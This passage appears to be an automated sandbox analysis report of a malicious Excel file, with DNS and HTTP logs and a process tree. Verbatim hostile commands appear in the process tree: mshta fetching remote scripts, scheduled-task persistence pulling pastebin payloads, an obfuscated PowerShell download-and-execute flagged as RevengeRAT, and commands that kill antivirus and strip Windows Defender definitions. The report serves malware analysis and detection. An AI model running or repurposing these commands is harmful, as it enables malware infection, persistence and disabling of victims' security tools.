Mr 13, 2019 21:17:47.774808884 MEZ	53	49810	8.8.8.8	192.168.1.16
Mr 13, 2019 21:17:49.074028969 MEZ	55151	53	192.168.1.16	8.8.8.8
Mr 13, 2019 21:17:49.104475021 MEZ	53	55151	8.8.8.8	192.168.1.16
Mr 13, 2019 21:17:49.358627081 MEZ	53216	53	192.168.1.16	8.8.8.8
Mr 13, 2019 21:17:49.388880968 MEZ	53	53216	8.8.8.8	192.168.1.16
Mr 13, 2019 21:17:56.370340109 MEZ	49792	53	192.168.1.16	8.8.8.8
Mr 13, 2019 21:17:56.382875919 MEZ	53	49792	8.8.8.8	192.168.1.16
Mr 13, 2019 21:17:58.580399990 MEZ	50672	53	192.168.1.16	8.8.8.8
Mr 13, 2019 21:17:58.614438057 MEZ	53	50672	8.8.8.8	192.168.1.16
Mr 13, 2019 21:18:07.307842970 MEZ	54414	53	192.168.1.16	8.8.8.8
Mr 13, 2019 21:18:07.313368082 MEZ	61734	53	192.168.1.16	8.8.8.8
Mr 13, 2019 21:18:07.321567059 MEZ	53	54414	8.8.8.8	192.168.1.16
Mr 13, 2019 21:18:07.326215029 MEZ	53	61734	8.8.8.8	192.168.1.16
Mr 13, 2019 21:18:28.037341118 MEZ	55067	53	192.168.1.16	8.8.8.8
Mr 13, 2019 21:18:28.049468040 MEZ	53	55067	8.8.8.8	192.168.1.16
Mr 13, 2019 21:18:29.073802948 MEZ	64117	53	192.168.1.16	8.8.8.8
Mr 13, 2019 21:18:29.100644112 MEZ	53	64117	8.8.8.8	192.168.1.16

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Mr 13, 2019 21:17:46.085319042 MEZ	192.168.1.16	8.8.8.8	0x544d	Standard query (0)	www.bitly.com	A (IP address)	IN (0x0001)
Mr 13, 2019 21:17:46.453646898 MEZ	192.168.1.16	8.8.8.8	0xe0c4	Standard query (0)	bitly.com	A (IP address)	IN (0x0001)
Mr 13, 2019 21:17:46.760349035 MEZ	192.168.1.16	8.8.8.8	0x912e	Standard query (0)	treffictesgn.blogspot.com	A (IP address)	IN (0x0001)
Mr 13, 2019 21:17:47.760054111 MEZ	192.168.1.16	8.8.8.8	0x912e	Standard query (0)	treffictesgn.blogspot.com	A (IP address)	IN (0x0001)
Mr 13, 2019 21:17:49.074028969 MEZ	192.168.1.16	8.8.8.8	0x576f	Standard query (0)	www.blogger.com	A (IP address)	IN (0x0001)
Mr 13, 2019 21:17:49.358627081 MEZ	192.168.1.16	8.8.8.8	0x5a47	Standard query (0)	resources.blogblog.com	A (IP address)	IN (0x0001)
Mr 13, 2019 21:17:56.370340109 MEZ	192.168.1.16	8.8.8.8	0x1549	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)
Mr 13, 2019 21:17:58.580399990 MEZ	192.168.1.16	8.8.8.8	0x9c3	Standard query (0)	pussi244.ddns.net	A (IP address)	IN (0x0001)
Mr 13, 2019 21:18:07.307842970 MEZ	192.168.1.16	8.8.8.8	0x6bf1	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)
Mr 13, 2019 21:18:07.313368082 MEZ	192.168.1.16	8.8.8.8	0xf458	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)
Mr 13, 2019 21:18:28.037341118 MEZ	192.168.1.16	8.8.8.8	0xb5af	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)
Mr 13, 2019 21:18:29.073802948 MEZ	192.168.1.16	8.8.8.8	0x603d	Standard query (0)	pussi244.ddns.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Mr 13, 2019 21:17:46.122653008 MEZ	8.8.8.8	192.168.1.16	0x544d	No error (0)	www.bitly.com	bitly.com		CNAME (Canonical name)	IN (0x0001)
Mr 13, 2019 21:17:46.122653008 MEZ	8.8.8.8	192.168.1.16	0x544d	No error (0)	bitly.com		67.199.248.14	A (IP address)	IN (0x0001)
Mr 13, 2019 21:17:46.122653008 MEZ	8.8.8.8	192.168.1.16	0x544d	No error (0)	bitly.com		67.199.248.15	A (IP address)	IN (0x0001)
Mr 13, 2019 21:17:46.482311964 MEZ	8.8.8.8	192.168.1.16	0xe0c4	No error (0)	bitly.com		67.199.248.14	A (IP address)	IN (0x0001)
Mr 13, 2019 21:17:46.482311964 MEZ	8.8.8.8	192.168.1.16	0xe0c4	No error (0)	bitly.com		67.199.248.15	A (IP address)	IN (0x0001)
Mr 13, 2019 21:17:47.774808884 MEZ	8.8.8.8	192.168.1.16	0x912e	No error (0)	treffictesgn.blogspot.com	blogspot.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Mr 13, 2019 21:17:47.774808884 MEZ	8.8.8.8	192.168.1.16	0x912e	No error (0)	blogspot.l.googleusercontent.com		172.217.168.33	A (IP address)	IN (0x0001)
Mr 13, 2019 21:17:49.104475021 MEZ	8.8.8.8	192.168.1.16	0x576f	No error (0)	www.blogger.com	blogger.l.google.com		CNAME (Canonical name)	IN (0x0001)
Mr 13, 2019 21:17:49.388880968 MEZ	8.8.8.8	192.168.1.16	0x5a47	No error (0)	resources.blogblog.com	blogger.l.google.com		CNAME (Canonical name)	IN (0x0001)
Mr 13, 2019 21:17:56.382875919 MEZ	8.8.8.8	192.168.1.16	0x1549	No error (0)	pastebin.com		104.20.208.21	A (IP address)	IN (0x0001)
Mr 13, 2019 21:17:56.382875919 MEZ	8.8.8.8	192.168.1.16	0x1549	No error (0)	pastebin.com		104.20.209.21	A (IP address)	IN (0x0001)
Mr 13, 2019 21:17:58.614438057 MEZ	8.8.8.8	192.168.1.16	0x9c3	No error (0)	pussi244.ddns.net		216.170.123.122	A (IP address)	IN (0x0001)
Mr 13, 2019 21:18:07.321567059 MEZ	8.8.8.8	192.168.1.16	0x6bf1	No error (0)	pastebin.com		104.20.209.21	A (IP address)	IN (0x0001)
Mr 13, 2019 21:18:07.321567059 MEZ	8.8.8.8	192.168.1.16	0x6bf1	No error (0)	pastebin.com		104.20.208.21	A (IP address)	IN (0x0001)
Mr 13, 2019 21:18:07.326215029 MEZ	8.8.8.8	192.168.1.16	0xf458	No error (0)	pastebin.com		104.20.209.21	A (IP address)	IN (0x0001)
Mr 13, 2019 21:18:07.326215029 MEZ	8.8.8.8	192.168.1.16	0xf458	No error (0)	pastebin.com		104.20.208.21	A (IP address)	IN (0x0001)
Mr 13, 2019 21:18:28.049468040 MEZ	8.8.8.8	192.168.1.16	0xb5af	No error (0)	pastebin.com		104.20.209.21	A (IP address)	IN (0x0001)
Mr 13, 2019 21:18:28.049468040 MEZ	8.8.8.8	192.168.1.16	0xb5af	No error (0)	pastebin.com		104.20.208.21	A (IP address)	IN (0x0001)
Mr 13, 2019 21:18:29.100644112 MEZ	8.8.8.8	192.168.1.16	0x603d	No error (0)	pussi244.ddns.net		216.170.123.122	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.bitly.com

bitly.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.1.16	49222	67.199.248.14	80	C:\Windows\System32\mshta.exe

Timestamp	kBytes transferred	Direction	Data
Mr 13, 2019 21:17:46.328686953 MEZ	0	OUT	GET /SexoPhone2 HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: www.bitly.com Connection: Keep-Alive
Mr 13, 2019 21:17:46.436212063 MEZ	1	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 13 Mar 2019 20:17:46 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: http://bitly.com/SexoPhone2 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.1.16	49223	67.199.248.14	80	C:\Windows\System32\mshta.exe

Timestamp	kBytes transferred	Direction	Data
Mr 13, 2019 21:17:46.594960928 MEZ	2	OUT	GET /SexoPhone2 HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: bitly.com Connection: Keep-Alive
Mr 13, 2019 21:17:46.723520041 MEZ	2	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 13 Mar 2019 20:17:46 GMT Content-Type: text/html; charset=utf-8 Content-Length: 137 Connection: keep-alive Cache-Control: private, max-age=90 Location: https://treffictesgn.blogspot.com/p/blog-page.html Set-Cookie: _bit=j2dkhK-cf8a8aa4235fbe9504-00C; Domain=bitly.com; Expires=Mon, 09 Sep 2019 20:17:46 GMT Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 72 65 66 66 69 63 74 65 73 67 6e 2e 62 6c 6f 67 73 70 6f 74 2e 63 6f 6d 2f 70 2f 62 6c 6f 67 2d 70 61 67 65 2e 68 74 6d 6c 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Bitly</title></head><body><a href="https://treffictesgn.blogspot.com/p/blog-page.html">moved here</a></body></html>

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After
Mr 13, 2019 21:17:47.912781000 MEZ	172.217.168.33	443	192.168.1.16	49224
Mr 13, 2019 21:17:56.492577076 MEZ	104.20.208.21	443	192.168.1.16	49229	CN=ssl509084.cloudflaressl.com, OU=PositiveSSL Multi-Domain, OU=Domain Control Validated CN=COMODO RSA Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=COMODO RSA Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE	Fri Oct 05 02:00:00 CEST 2018 Thu Sep 25 02:00:00 CEST 2014 Tue May 30 12:48:38 CEST 2000	Sun Apr 14 01:59:59 CEST 2019 Tue Sep 25 01:59:59 CEST 2029 Sat May 30 12:48:38 CEST 2020
					CN=COMODO RSA Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Sep 25 02:00:00 CEST 2014	Tue Sep 25 01:59:59 CEST 2029
					CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE	Tue May 30 12:48:38 CEST 2000	Sat May 30 12:48:38 CEST 2020

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2144 Parent PID: 532

General

Start time:	21:17:29
Start date:	13/03/2019
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x2f540000
File size:	20392608 bytes
MD5 hash:	716335EDBB91DA84FC102425BFDA957E
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: mshta.exe PID: 1228 Parent PID: 2144

General

Start time:	21:17:43
Start date:	13/03/2019
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta.exe http://www.bitly.com/SexoPhone2
Imagebase:	0xa0000
File size:	13312 bytes
MD5 hash:	ABDFC692D9FE43E2BA8FE6CB5A8CB95A
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 2472 Parent PID: 1228

General

Start time:	21:17:48
Start date:	13/03/2019
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 100 /tn 'MicrofoftOffice19' /tr 'mshta vbscript:CreateObject(\'Wscript.Shell\').Run(\'mshta.exe https://pastebin.com/raw/UwmtjtG9\',0,true)(window.close)' /F
Imagebase:	0x9c0000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 704 Parent PID: 1228

General

Start time:	21:17:48
Start date:	13/03/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /c powershell -Noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 'ttp' + 's:/' + '/pastebin' + '.' + 'com/raw/J4rMxGNR'))).EnTrYPoInT.InVoKe($N,$N)
Imagebase:	0x4aca0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 884 Parent PID: 1228

General

Start time:	21:17:48
Start date:	13/03/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /C forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & exit
Imagebase:	0x4aca0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 912 Parent PID: 1228

General

Start time:	21:17:48
Start date:	13/03/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /c cd 'C:\Program Files\Windows Defender' & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & forfiles /c 'taskkill /f /im MSASCuiL.exe' & forfiles /c 'taskkill /f /im MpCmdRun.exe' & exit
Imagebase:	0x4aca0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 3888 Parent PID: 1228

General

Start time:	22:57:00
Start date:	13/03/2019
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 60 /tn 'Ms-New' /tr 'mshta vbscript:CreateObject(\'Wscript.Shell\').Run(\'mshta.exe https://pastebin.com/raw/w3Y29LYH\',0,true)(window.close)' /F
Imagebase:	0x2d0000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskeng.exe PID: 2528 Parent PID: 796

General

Start time:	22:57:00
Start date:	13/03/2019
Path:	C:\Windows\System32\taskeng.exe
Wow64 process (32bit):	false
Commandline:	taskeng.exe {DEF81FE9-E535-4A37-A1ED-09F34CC17167} S-1-5-21-312302014-279660585-3511680526-1004:computer\user:Interactive:[2]
Imagebase:	0x2d0000
File size:	192000 bytes
MD5 hash:	4F2659160AFCCA990305816946F69407
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: powershell.exe PID: 620 Parent PID: 704

General

Start time:	22:57:00
Start date:	13/03/2019
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 'ttp' + 's:/' + '/pastebin' + '.' + 'com/raw/J4rMxGNR'))).EnTrYPoInT.InVoKe($N,$N)
Imagebase:	0x227d0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: RevengeRAT_Sep17, Description: Detects RevengeRAT malware, Source: 0000000C.00000002.1807343124.04440000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: mshta.exe PID: 3880 Parent PID: 2528

General

Start time:	22:57:00
Start date:	13/03/2019
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\mshta.EXE vbscript:CreateObject('Wscript.Shell').Run('mshta.exe https://pastebin.com/raw/UwmtjtG9',0,true)(window.close)
Imagebase:	0xa0000
File size:	13312 bytes
MD5 hash:	ABDFC692D9FE43E2BA8FE6CB5A8CB95A
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: forfiles.exe PID: 2880 Parent PID: 884

General

Start time:	22:57:00
Start date:	13/03/2019
Path:	C:\Windows\System32\forfiles.exe
Wow64 process (32bit):	false
Commandline:	forfiles /c 'taskkill /f /im AvastUi.exe'
Imagebase:	0xf50000
File size:	43008 bytes
MD5 hash:	831F24F91D96C301529BE0C96FB352B9
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: MpCmdRun.exe PID: 2760 Parent PID: 912

General

Start time:	22:57:01
Start date:	13/03/2019
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	MpCmdRun.exe -removedefinitions -dynamicsignatures
Imagebase:	0x820000
File size:	157184 bytes
MD5 hash:	050B12A317DD0D9A2A595ED8F06F0EE5
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskkill.exe PID: 1300 Parent PID: 912

General

Start time:	22:57:01
Start date:	13/03/2019
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /f /im winword.exe
Imagebase:	0x390000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskkill.exe PID: 2368 Parent PID: 2880

General

Start time:	22:57:01
Start date:	13/03/2019
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	/f /im AvastUi.exe
Imagebase:	0x390000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: mshta.exe PID: 2832 Parent PID: 2528

General

Start time:	23:57:00
Start date:	13/03/2019
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\mshta.EXE vbscript:CreateObject('Wscript.Shell').Run('mshta.exe https://pastebin.com/raw/w3Y29LYH',0,true)(window.close)
Imagebase:	0xa0000
File size:	13312 bytes
MD5 hash:	ABDFC692D9FE43E2BA8FE6CB5A8CB95A
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskkill.exe PID: 2124 Parent PID: 2880

General

Start time:	23:57:00
Start date:	13/03/2019
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	/f /im AvastUi.exe
Imagebase:	0xd70000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskkill.exe PID: 1144 Parent PID: 912

General

Start time:	23:57:00
Start date:	13/03/2019
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /f /im excel.exe
Imagebase:	0xd70000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskkill.exe PID: 1048 Parent PID: 912

General

Start time:	23:57:00
Start date:	13/03/2019
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /f /im MSPUB.exe
Imagebase:	0xd70000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskkill.exe PID: 1236 Parent PID: 2880

General

Start time:	23:57:00
Start date:	13/03/2019
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	/f /im AvastUi.exe
Imagebase:	0xd70000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskkill.exe PID: 2200 Parent PID: 2880

General

Start time:	23:57:01
Start date:	13/03/2019
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	/f /im AvastUi.exe
Imagebase:	0xd70000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskkill.exe PID: 2040 Parent PID: 912

General

Start time:	23:57:01
Start date:	13/03/2019
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /f /im POWERPNT.EXE
Imagebase:	0xd70000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: forfiles.exe PID: 2964 Parent PID: 912

General

Start time:	23:57:01
Start date:	13/03/2019
Path:	C:\Windows\System32\forfiles.exe
Wow64 process (32bit):	false
Commandline:	forfiles /c 'taskkill /f /im MSASCuiL.exe'
Imagebase:	0xf50000
File size:	43008 bytes
MD5 hash:	831F24F91D96C301529BE0C96FB352B9
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskkill.exe PID: 3020 Parent PID: 2880

General

Start time:	23:57:01
Start date:	13/03/2019
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	/f /im AvastUi.exe
Imagebase:	0x1a0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskkill.exe PID: 1860 Parent PID: 2880

General

Start time:	23:57:01
Start date:	13/03/2019
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	/f /im AvastUi.exe
Imagebase:	0xc70000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskkill.exe PID: 3304 Parent PID: 2964

General

Start time:	23:57:02
Start date:	13/03/2019
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	/f /im MSASCuiL.exe
Imagebase:	0xc70000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskkill.exe PID: 3460 Parent PID: 2880

General

Start time:	23:57:02
Start date:	13/03/2019
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	/f /im AvastUi.exe
Imagebase:	0xc70000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskkill.exe PID: 3720 Parent PID: 2964

General

Start time:	23:57:02
Start date:	13/03/2019
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	/f /im MSASCuiL.exe
Imagebase:	0xc70000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskkill.exe PID: 1568 Parent PID: 2964

General

Start time:	23:57:03
Start date:	13/03/2019
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	/f /im MSASCuiL.exe
Imagebase:	0xc70000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskkill.exe PID: 3236 Parent PID: 2880

General

Start time:	23:57:03
Start date:	13/03/2019
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	/f /im AvastUi.exe
Imagebase:	0xc70000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskkill.exe PID: 3240 Parent PID: 2880

General

Start time:	23:57:03
Start date:	13/03/2019
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	/f /im AvastUi.exe
Imagebase:	0xc70000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskkill.exe PID: 920 Parent PID: 2964

General

Start time:	23:57:03
Start date:	13/03/2019
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	/f /im MSASCuiL.exe
Imagebase:	0xc70000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskkill.exe PID: 3444 Parent PID: 2964

General

Start time:	23:57:04
Start date:	13/03/2019
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	/f /im MSASCuiL.exe
Imagebase:	0xc70000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskkill.exe PID: 1288 Parent PID: 2880

General

Start time:	23:57:04
Start date:	13/03/2019
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	/f /im AvastUi.exe
Imagebase:	0xc70000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

